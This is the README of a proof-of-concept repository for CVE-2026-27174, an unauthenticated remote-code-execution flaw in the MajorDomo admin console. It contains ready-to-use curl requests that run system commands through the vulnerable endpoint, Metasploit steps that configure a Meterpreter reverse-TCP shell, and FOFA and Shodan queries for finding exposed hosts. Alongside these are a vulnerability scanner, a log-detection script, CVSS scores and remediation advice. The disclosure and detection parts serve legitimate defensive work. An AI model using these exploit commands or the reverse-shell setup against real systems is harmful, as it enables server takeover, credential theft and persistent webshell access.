MaxMnMl/majordomo-CVE-2026-27174-poc

majordomo-CVE-2026-27174-poc

A proof-of-concept for CVE-2026-27174, an unauthenticated remote code execution vulnerability reachable through the admin panel's PHP console feature in MajorDomo (Major Domestic Module).

Vulnerability

MajorDoMo's admin panel exposes a PHP evaluation console via /admin.php. Due to a missing exit after an authentication redirect in panel.class.php, the AJAX handler inc_panel_ajax.php is included unconditionally — making its eval() reachable by any unauthenticated HTTP request.

An attacker can execute arbitrary PHP code with a single GET request, requiring no credentials, no prior access, and no interaction from the victim.

Affected Versions

  • All MajorDomo versions prior to the patch of February 18, 2026.

Detection Scanner

scan.py is a non-destructive multi-threaded scanner that detects hosts vulnerable to CVE-2026-27174 without executing any harmful payload.

How it works

The scanner operates in three sequential phases per target:

Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

A random alphanumeric marker is generated per request to avoid false positives from caching, WAFs, or response pollution.

Usage

Requirements

pip install requests

1. Prepare a targets file

Create a targets.txt file with one IP:PORT per line:

192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. Run the scanner

python3 scan.py targets.txt

Output

[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

Automatically generated when at least one vulnerable host is found:

[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]
| Field | Description |
|---|---|
| target | Scanned IP:PORT |
| url | Full URL where RCE was confirmed |
| rce_php | PHP code execution confirmed (always true in results) |
| disable_functions | Server's disable_functions PHP setting (null if empty) |
| system_functions_available | OS execution functions callable by an attacker |
| impact_level | HIGH (OS exec reachable) or MEDIUM (PHP RCE only) |

Exploitation

Based on the system_functions_available field in results.json, a GET request calling one of the available functions can be crafted to exploit the RCE (the URL is quoted so the shell does not interpret the & separators):

curl 'http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('"'"'id'"'"');'
# or
curl 'http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('"'"'id'"'"');'

uid=33(www-data) gid=33(www-data) groups=33(www-data)
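From the defender's side, the request shape shown above is what to look for in web server access logs. The following script is an added example and not part of this repository: it parses Combined Log Format lines, picks out requests to /admin.php carrying ajax_panel=1 and op=console, and rates each hit by whether the submitted command names one of the OS execution functions the scanner probes for (system, exec, shell_exec, passthru). The log lines it processes are constructed for the demonstration and use documentation addresses.

```python
"""Flag CVE-2026-27174 exploitation attempts in web server access logs.

Added example, not part of this repository. The log lines in SAMPLE_LOG
are constructed for the demonstration.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# OS execution functions the scanner probes for; their presence in a
# console command means the attempt went beyond PHP eval() to OS commands.
OS_EXEC_FUNCTIONS = ("system", "exec", "shell_exec", "passthru")

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_query(query):
    """Split a raw query string on '&' only and decode each key/value.

    Done by hand rather than with parse_qs so that ';' inside the PHP
    command (e.g. "echo system('id');") stays part of the value.
    The first occurrence of a key wins.
    """
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def classify_request(target):
    """Return a finding for a console request, or None for anything else."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin.php"):
        return None
    params = parse_query(parts.query)
    if params.get("ajax_panel") != "1" or params.get("op") != "console":
        return None
    command = params.get("command", "")
    # Any unauthenticated console call is an eval() attempt; escalate when
    # the command names an OS execution function (word-bounded, so "exec"
    # does not also match inside "shell_exec").
    os_functions = [
        fn for fn in OS_EXEC_FUNCTIONS
        if re.search(r"\b" + fn + r"\s*\(", command)
    ]
    severity = "OS_EXEC" if os_functions else "PHP_EVAL"
    return {"command": command, "os_functions": os_functions, "severity": severity}


def scan_log(lines):
    """Return a list of findings, one per line matching the console request shape."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        finding = classify_request(match.group("target"))
        if finding is None:
            continue
        finding.update(
            ip=match.group("ip"),
            time=match.group("time"),
            status=int(match.group("status")),
        )
        findings.append(finding)
    return findings


# Constructed sample traffic (documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Feb/2026:10:01:02 +0000] "GET /admin.php?ajax_panel=1&op=console&command=echo+%27abc123%27; HTTP/1.1" 200 612',
    '203.0.113.7 - - [20/Feb/2026:10:01:03 +0000] "GET /admin.php?ajax_panel=1&op=console&command=echo+system(%27id%27); HTTP/1.1" 200 680',
    '198.51.100.4 - - [20/Feb/2026:10:02:11 +0000] "GET /admin.php?op=panel HTTP/1.1" 302 0',
    '198.51.100.9 - - [20/Feb/2026:10:03:30 +0000] "GET /index.php HTTP/1.1" 200 4321',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} at {f['time']} status={f['status']} "
              f"command={f['command']!r}")
```

A PHP_EVAL hit with a short echo of a random string matches the scanner's Phase 1 marker check, so a single such request followed by console calls naming system or exec from the same client is the sequence worth alerting on; a 302 on /admin.php without the ajax_panel parameter is ordinary unauthenticated panel traffic and is ignored.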

Automation

Metasploit Module:

msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check   # verify it reports the target as Vulnerable
run     # verify a Meterpreter session opens as www-data

Into the wild

FOFA:

title="MajorDomoSL"

SHODAN:

http.title:"MajorDomoSL"

Impact

A remote unauthenticated attacker can:

  • Execute arbitrary PHP code on the server
  • Read sensitive files (/etc/passwd, configuration files, credentials)
  • Write PHP webshells for persistent access
  • Pivot to OS-level command execution if PHP functions system, exec, shell_exec, or passthru are not disabled

The effective impact depends on the server's disable_functions PHP configuration:

| Scenario | Impact Level | Description |
|---|---|---|
| No disable_functions | CRITICAL | Full OS command execution |
| Partial restrictions | HIGH | PHP RCE + partial OS exec |
| disable_functions blocks all exec | MEDIUM | PHP RCE only (file read/write, data exfiltration) |

CVSS 4.0 - 9.3 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Remediation & Mitigation

Update to the latest version of MajorDomo (Major Domestic Module).

| Control | Prevents RCE | Prevents OS Exec |
|---|---|---|
| Apply the February 18, 2026 patch | | |
| Firewall/IP allowlist on /admin.php | | |
| disable_functions hardening | | |

References

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

sergejey/majordomo#1177

Disclaimer

This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.
